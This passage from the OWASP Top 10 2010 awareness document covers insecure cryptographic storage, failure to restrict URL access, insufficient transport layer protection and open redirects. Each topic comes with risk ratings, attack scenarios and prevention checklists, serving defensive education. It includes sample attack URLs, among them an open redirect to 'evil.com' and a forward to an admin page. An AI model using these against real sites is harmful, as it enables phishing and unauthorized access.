| class="ce129" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce130" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span>
 
 
 
<span class="T12">DIFFICULT</span>
 
| class="ce131" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
 
<span class="T12">UNCOMMON</span>
 
| class="ce132" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
 
<span class="T12">DIFFICULT</span>
 
| class="ce133" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
 
<span class="T12">SEVERE</span>
 
| class="ce134" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro21"
 
| class="ce135" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the users of your system. Would they like to gain access to protected data they aren’t authorized for? What about internal administrators?</span>
 
| class="ce136" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attackers typically don’t break the crypto. They break something else, such as find keys, get cleartext copies of data, or access data via channels that automatically decrypt.</span>
 
| class="ce137" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">The most common flaw in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys, and weak algorithm usage is common. Use of weak or unsalted hashes to protect passwords is also common. External attackers have difficulty detecting such flaws due to limited access. They usually must exploit something else first to gain the needed access.</span>
 
| class="ce138" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Failure frequently compromises all data that should have been encrypted. Typically this information includes  sensitive data such as health records, credentials, personal data, credit cards, etc.</span>
 
| class="ce139" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the business value of the lost data and impact to your reputation. What is your legal liability if this data is exposed? Also consider the damage to your reputation.</span>
 
|}
 
 
 
[[Image:./]]
 
  
 +
{{Top_10_2010:SubsectionColoredTemplate|The Pages of the Top 10|}}
 +
<div style="font-size: 150%; font-weight: bold;">
 +
* [[Top 10 2010-Release Notes|Release Notes]]
 +
* [[Top 10 2010-Main|The OWASP 2010 Top 10]]
 +
* [[Top_10_2010-What's_Next_For_Developers|What's Next for Developers]]
 +
* [[Top_10_2010-What's_Next_For_Verifiers|What's Next for Verifiers]]
 +
* [[Top_10_2010-What's_Next_For_Organizations|What's Next for Organizations]]
 +
* [[Top_10_2010-Notes About Risk|Notes About Risk]]
 +
* [[Top_10_2010-Details_About_Risk_Factors|Details About Risk Factors]]
 
</div>
 
</div>
  
<span class="T15"><br /></span><span class="T15">Example Attack Scenarios</span>
 
 
<span class="T11">Scenario #1</span><span class="T8"><nowiki>: An application encrypts credit cards in a database to prevent exposure to end users. However, the database is set to automatically decrypt queries against the credit card columns, allowing a SQL injection flaw to retrieve all the credit cards in cleartext. The system should have been configured to allow only back end applications to decrypt them, not the front end web application.</nowiki></span>
 
 
<span class="T11">Scenario #2</span><span class="T8"><nowiki>: A backup tape is made of encrypted health records, but the encryption key is on the same backup. The tape never arrives at the backup center.</nowiki></span>
 
 
<span class="T11">Scenario #3</span><span class="T8"><nowiki>: The password database uses unsalted hashes to store everyone’s passwords. A file upload flaw allows an attacker to retrieve the password file. All the unsalted hashes can be brute forced in 4 weeks, while properly salted hashes would have taken over 3000 years.</nowiki></span>
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable?</span>
 
 
<span class="T8">The first thing you have to determine is which data is sensitive enough to require encryption. For example, passwords, credit cards, health records, and personal information should be encrypted. For all such data, ensure:</span>
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">It is encrypted everywhere it is stored long term, particularly in backups of this data.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Only authorized users can access decrypted copies of the data (i.e., access control – See A4 and A8).</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">A strong standard encryption algorithm is used.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">A strong key is generated, protected from unauthorized access, and key change is planned for.</span><span class="odfLiEnd"> </span>
 
 
<span class="T8">And more … For a more complete set of problems to avoid, see the </span><span class="T8">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS requirements on Cryptography (V7)]</span>
 
 
<span class="T8"></span>
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
<span class="T19">OWASP</span>
 
 
<span class="T8">For a more complete set of requirements and problems to avoid in this area, see the </span><span class="T8">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS requirements on Cryptography (V7)]</span><span class="T8">.</span>
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage OWASP Top 10-2007 on Insecure Cryptographic Storage]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encryptor.html ESAPI ]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encryptor.html Encryptor]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encryptor.html  API]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Guide_to_Cryptography#Insecure_transmission_of_secrets OWASP Development Guide: Chapter on Cryptography]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Codereview-Cryptography OWASP Code Review Guide: Chapter on Cryptography]</span><span class="odfLiEnd"> </span>
 
 
<span class="T19">External</span>
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/310.html CWE Entry 310 on Cryptographic Issues]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/312.html CWE Entry 312 on ]</span><span class="T11">[http://cwe.mitre.org/data/definitions/312.html Cleartext]</span><span class="T11">[http://cwe.mitre.org/data/definitions/312.html  Storage of Sensitive Information]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/326.html CWE Entry 326 on Weak Encryption]</span><span class="odfLiEnd"> </span>
 
 
<span class="T11"></span>
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent This?</span>
 
 
<span class="T8">The full perils of unsafe cryptography are well beyond the scope of this Top 10. That said, for all sensitive data deserving encryption, do all of the following, at a minimum:</span>
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Considering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all such data at rest in a manner that defends against these threats.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Ensure offsite backups are encrypted, but the keys are managed and backed up separately.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Ensure appropriate strong standard algorithms and strong keys are used, and key management is in place.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Ensure passwords are hashed with a strong standard algorithm and an appropriate salt is used.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Ensure all keys and passwords are protected from unauthorized access.</span><span class="odfLiEnd"> </span>
 
 
<span class="T8"></span>
 
 
<div id="Title_25" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
<span class="T5">Insecure Cryptographic</span><span class="T5"><br /></span><span class="T5">Storage</span>
 
 
</div></div><div id="Text_Placeholder_26" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A7</span><span class="odfLiEnd"> </span>
 
 
</div></div>
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
<span class="T4"><span title="page-number">13</span></span><span class="T4"><span title="page-number">13</span></span>
 
 
</div></div></div><div id="page14" class="dp3"><div id="Table_104" style="height: 7.053cm; width: 19.049cm">
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro13"
 
| class="ce140" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce141" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span>
 
 
<span class="T12">EASY</span>
 
| class="ce142" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
<span class="T12">UNCOMMON</span>
 
| class="ce143" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
<span class="T12">AVERAGE</span>
 
| class="ce144" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
<span class="T12">MODERATE</span>
 
| class="ce145" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro18"
 
| class="ce146" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Anyone with network access can send your application a request. Could anonymous users access a private page or regular users a privileged page? </span>
 
| class="ce147" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attacker, who is an authorized system user, simply changes the URL to a privileged page. Is access granted? Anonymous users could access private pages that aren’t protected.</span>
 
| class="ce148" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">Applications are not always protecting page requests properly. Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget.</span>
 
 
<span class="T8">Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack.</span>
 
| class="ce149" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack.</span>
 
| class="ce150" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the business value of the exposed functions and the data they process.</span>
 
 
<span class="T8">Also consider the impact to your reputation if this vulnerability became public.</span>
 
|}
 
 
[[Image:./]]
 
 
</div>
 
 
<span class="T15"><br /></span><span class="T15">Example Attack Scenario</span>
 
 
<span class="T8">The attacker simply force browses to target URLs. Consider the following URLs which are both supposed to require authentication, and admin rights are also required for access to the “</span><span class="T31">admin_getappInfo” </span><span class="T8">page.</span>
 
 
<span class="T26">  </span><span class="T26">http://example.com/app/getappInfo</span>
 
 
<span class="T26">  </span><span class="T26">http://example.com/app/admin_getappInfo</span>
 
 
<span class="T8">If the attacker is not authenticated, and access to either page is granted, then unauthorized access was allowed. If an authenticated, non-admin, user is allowed to access the “</span><span class="T31">admin_getappInfo”</span><span class="T26"> </span><span class="T8">page, this is a flaw, and may lead the attacker to more improperly protected admin pages.</span>
 
 
<span class="T8">Such flaws are frequently introduced when links and buttons are simply not displayed to unauthorized users, but the application fails to protect the pages they target.</span>
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable?</span>
 
 
<span class="T8">The best way to find out if an application has failed to properly restrict URL access is to verify </span><span class="T10">every </span><span class="T8">page. Consider for each page, is the page supposed to be public or private. If a private page:</span>
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Is authentication required to access that page?</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Is it supposed to be accessible to ANY authenticated user? If not, is an authorization check made to ensure the user has permission to access that page?</span><span class="odfLiEnd"> </span>
 
 
<span class="T8">External security mechanisms frequently provide authentication and authorization checks for page access. Verify they are properly configured for every page. If code level protection is used, verify that code level protection is in place for every required page. Testing can also verify whether proper protection is in place.</span>
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
<span class="T19">OWASP</span>
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access OWASP Top 10-2007 on Failure to Restrict URL Access]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T32"> </span><span class="T33">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html ESAPI Access Control API]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Guide_to_Authorization OWASP Development Guide: Chapter on Authorization]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Testing_for_Path_Traversal OWASP Testing Guide: Testing for Path Traversal]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Forced_browsing OWASP Article on Forced Browsing]</span><span class="odfLiEnd"> </span>
 
 
<span class="T8">For additional access control requirements, see the </span><span class="T8">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS requirements area for Access Control (V4)]</span><span class="T8">.</span>
 
 
<span class="T8"></span>
 
 
<span class="T19">External</span>
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/285.html CWE Entry 285 on Improper Access Control (Authorization)]</span><span class="odfLiEnd"> </span>
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent This?</span>
 
 
<span class="T8">Preventing unauthorized URL access requires selecting an approach for requiring proper authentication and proper authorization for each page. Frequently, such protection is provided by one or more components external to the application code. Regardless of the mechanism(s), all of the following are recommended: </span>
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">The authentication and authorization policies be role based, to minimize the effort required to maintain these policies.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">The policies should be highly configurable, in order to minimize any hard coded aspects of the policy.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">The enforcement mechanism(s) should deny all access by default, requiring explicit grants to specific users and roles for access to every page.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">If the page is involved in a workflow, check to make sure the conditions are in the proper state to allow access.</span><span class="odfLiEnd"> </span>
 
 
<div id="Title_25" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
<span class="T5">Failure to Restrict URL Access</span>
 
 
</div></div><div id="Text_Placeholder_26" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A8</span><span class="odfLiEnd"> </span>
 
 
</div></div>
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
<span class="T4"><span title="page-number">14</span></span><span class="T4"><span title="page-number">14</span></span>
 
 
</div></div></div><div id="page15" class="dp3"><div id="Table_104" style="height: 8.262cm; width: 19.049cm">
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro13"
 
| class="ce151" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce152" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span>
 
 
<span class="T12">DIFFICULT</span>
 
| class="ce153" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
<span class="T12">COMMON</span>
 
| class="ce154" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
<span class="T12">EASY</span>
 
| class="ce155" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
<span class="T12">MODERATE</span>
 
| class="ce156" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro23"
 
| class="ce157" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider anyone who can monitor the network traffic of your users. If the application is on the internet, who knows how your users access it. Don’t forget back end connections.</span>
 
| class="ce158" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Monitoring users’ network traffic can be difficult, but is sometimes easy. The primary difficulty lies in monitoring the proper network’s traffic while users are accessing the vulnerable site. </span>
 
| class="ce159" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">Applications frequently do not protect network traffic. They may use SSL/TLS during authentication, but not elsewhere, exposing data and session IDs to interception. Expired or improperly configured certificates may also be used.</span>
 
 
<span class="T8">Detecting basic flaws is easy. Just observe the site’s network traffic. More subtle flaws require inspecting the design of the application and the server configuration. </span>
 
| class="ce160" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Such flaws expose individual users’ data and can lead to account theft. If an admin account was compromised, the entire site could be exposed. Poor SSL setup can also facilitate phishing  and MITM attacks.</span>
 
| class="ce161" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the business value of the data exposed on the communications channel in terms of its confidentiality and integrity needs, and the need to authenticate both participants.</span>
 
|}
 
 
[[Image:./]]
 
 
</div>
 
 
<span class="T15"><br /></span><span class="T15">Example Attack Scenarios</span>
 
 
<span class="T11">Scenario #1</span><span class="T8"><nowiki>: The site simply doesn’t use SSL for all pages that require authentication. Attacker simply monitors network traffic (like an open wireless or their neighborhood cable modem network), and observes an authenticated victim’s session cookie. Attacker then replays this cookie and takes over the user’s session.</nowiki></span>
 
 
<span class="T11">Scenario #2</span><span class="T8"><nowiki>: Site has improperly configured SSL certificate which causes browser warnings for its users. Users have to accept such warnings and continue, in order to use the site. This causes users to get accustomed to such warnings. Phishing attack against site’s customers lures them to a lookalike site which doesn’t have valid certificate generating similar browser warnings. Since victims are accustomed to such warnings, they proceed on and use the phishing site, giving away passwords or other private data.</nowiki></span>
 
 
<span class="T11">Scenario #3</span><span class="T8"><nowiki>: Site simply uses standard ODBC/JDBC for the database connection, not realizing all traffic is in the clear.</nowiki></span>
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable?</span>
 
 
<span class="T8">The best way to find out if an application has insufficient transport layer protection is to verify that:</span>
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">SSL is used to protect all authentication related traffic.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">SSL is used for all resources on all private pages and services. This protects all data and session tokens that are exchanged. Mixed SSL on a page should be avoided since it causes user warnings in the browser, and may expose the user’s session ID.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Only strong algorithms are supported.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">All session cookies have their ‘secure’ flag set so the browser never transmits them in the clear.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">The server certificate is legitimate and properly configured for that server. This includes being issued by an authorized issuer, not expired, has not been revoked, and it matches all domains the site uses.</span><span class="odfLiEnd"> </span>
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
<span class="T19">OWASP</span>
 
 
<span class="T8">For a more complete set of requirements and problems to avoid in this area, see the </span><span class="T8">[http://www.owasp.org/index.php/ASVS#tab=Download ASVS requirements on Communications Security (V10)]</span><span class="T8">.</span>
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet OWASP Transport Layer Protection Cheat Sheet]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Top_10_2007-Insecure_Communications OWASP Top 10-2007 on Insecure Communications]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Guide_to_Cryptography#Insecure_transmission_of_secrets OWASP Development Guide: Chapter on Cryptography]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Testing_for_SSL-TLS OWASP Testing Guide: Chapter on SSL/TLS Testing]</span><span class="odfLiEnd"> </span>
 
 
<span class="T19">External</span>
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/319.html CWE Entry 319 on ]</span><span class="T11">[http://cwe.mitre.org/data/definitions/319.html Cleartext]</span><span class="T11">[http://cwe.mitre.org/data/definitions/319.html  Transmission of Sensitive Information]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">[https://www.ssllabs.com/ssldb/index.html SSL Labs Server Test]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T8">[http://csrc.nist.gov/publications/fips/fips140-2/fips1402.pdf Definition of FIPS 140-2 Cryptographic Standard]</span><span class="odfLiEnd"> </span>
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent This?</span>
 
 
<span class="T8">Providing proper transport layer protection can affect the site design. It’s easiest to require SSL for the entire site. For performance reasons, some sites use SSL only on private pages. Others use SSL only on ‘critical’ pages, but this can expose session IDs and other sensitive data. At a minimum, do all of the following:</span>
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Require SSL for all sensitive pages. Non-SSL requests to these pages should be redirected to the SSL page.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Set the ‘secure’ flag on all sensitive cookies.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Configure your SSL provider to only support strong (e.g., FIPS 140-2 compliant) algorithms.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Ensure your certificate is valid, not expired, not revoked, and matches all domains used by the site.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Backend and other connections should also use SSL or other encryption technologies.</span><span class="odfLiEnd"> </span>
 
 
<div id="Title_25" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
<span class="T5">Insufficient Transport Layer</span><span class="T5"><br /></span><span class="T5">Protection</span>
 
 
</div></div><div id="Text_Placeholder_26" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A9</span><span class="odfLiEnd"> </span>
 
 
</div></div>
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
<span class="T4"><span title="page-number">15</span></span><span class="T4"><span title="page-number">15</span></span>
 
 
</div></div></div><div id="page16" class="dp3"><div id="Table_104" style="height: 7.562cm; width: 19.049cm">
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro13"
 
| class="ce162" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
| class="ce163" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Exploitability</span>
 
 
<span class="T12">AVERAGE</span>
 
| class="ce164" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Prevalence</span>
 
 
<span class="T12">UNCOMMON</span>
 
| class="ce165" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Detectability</span>
 
 
<span class="T12">EASY</span>
 
| class="ce166" style="text-align: left; width: 3.175cm" |
 
<span class="T12">Impact</span>
 
 
<span class="T12">MODERATE</span>
 
| class="ce167" style="text-align: left; width: 3.175cm" |
 
<span class="T12">__________</span>
 
|- class="ro24"
 
| class="ce168" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider anyone who can trick your users into submitting a request to your website. Any website or other HTML feed that your users use could do this.</span>
 
| class="ce169" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Attacker links to unvalidated redirect and tricks victims into clicking it. Victims are more likely to click on it, since the link is to a valid site. Attacker targets unsafe forward to bypass security checks.</span>
 
| class="ce170" style="text-align: left; width: 3.175cm" colspan="2" |
 
<span class="T8">Applications frequently redirect users to other pages, or use internal forwards in a similar manner. Sometimes the target page is specified in an unvalidated parameter, allowing attackers to choose the destination page.</span>
 
 
<span class="T8">Detecting unchecked redirects is easy. Look for redirects where you can set the full URL. Unchecked forwards are harder, since they target internal pages.</span>
 
| class="ce171" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass.</span>
 
| class="ce172" style="text-align: left; width: 3.175cm" |
 
<span class="T8">Consider the business value of retaining your users’ trust. </span>
 
 
<span class="T8">What if they get owned by malware? </span>
 
 
<span class="T8">What if attackers can access internal only functions?</span>
 
|}
 
 
[[Image:./]]
 
 
</div>
 
 
<span class="T15"><br /></span><span class="T15">Example Attack Scenarios</span>
 
 
<span class="T11">Scenario #1</span><span class="T8"><nowiki>: The application has a page called “redirect.jsp” which takes a single parameter named “url”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.</nowiki></span>
 
 
<span class="T10">  </span><span class="T34">http://www.example.com/redirect.jsp?url=evil.com</span><span class="T8"> </span>
 
 
<span class="T11">Scenario #2</span><span class="T8"><nowiki>:The application uses forward to route requests between different parts of the site. To facilitate this, some pages use a parameter to indicate where the user should be sent if a transaction is successful. In this case, the attacker crafts a URL that will pass the application’s access control check and then forward the attacker to an administrative function that she would not normally be able to access.</nowiki></span>
 
 
<span class="T10">  </span><span class="T34">http://www.example.com/boring.jsp?fwd=admin.jsp</span>
 
 
<span class="T34"></span>
 
 
<span class="T15"><br /></span><span class="T15">Am I Vulnerable?</span>
 
 
<span class="T8">The best way to find out if an application has any unvalidated redirects or forwards is to:</span>
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Review the code for all uses of redirect or forward (called a transfer in .NET). For each use, identify if the target URL is included in any parameter values. If so, verify the parameter(s) are validated to contain only an allowed destination, or element of a destination.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Also, spider the site to see if it generates any redirects (HTTP response codes 300-307, typically 302). Look at the parameters supplied prior to the redirect to see if they appear to be a target URL or a piece of such a URL. If so, change the URL target and observe whether the site redirects to the new target.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">If code is unavailable, check all parameters to see if they look like part of a redirect or forward URL destination and test them.</span><span class="odfLiEnd"> </span>
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
<span class="T19">OWASP</span>
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Open_redirect OWASP Article on Open Redirects ]</span><span class="odfLiEnd"> </span>
 
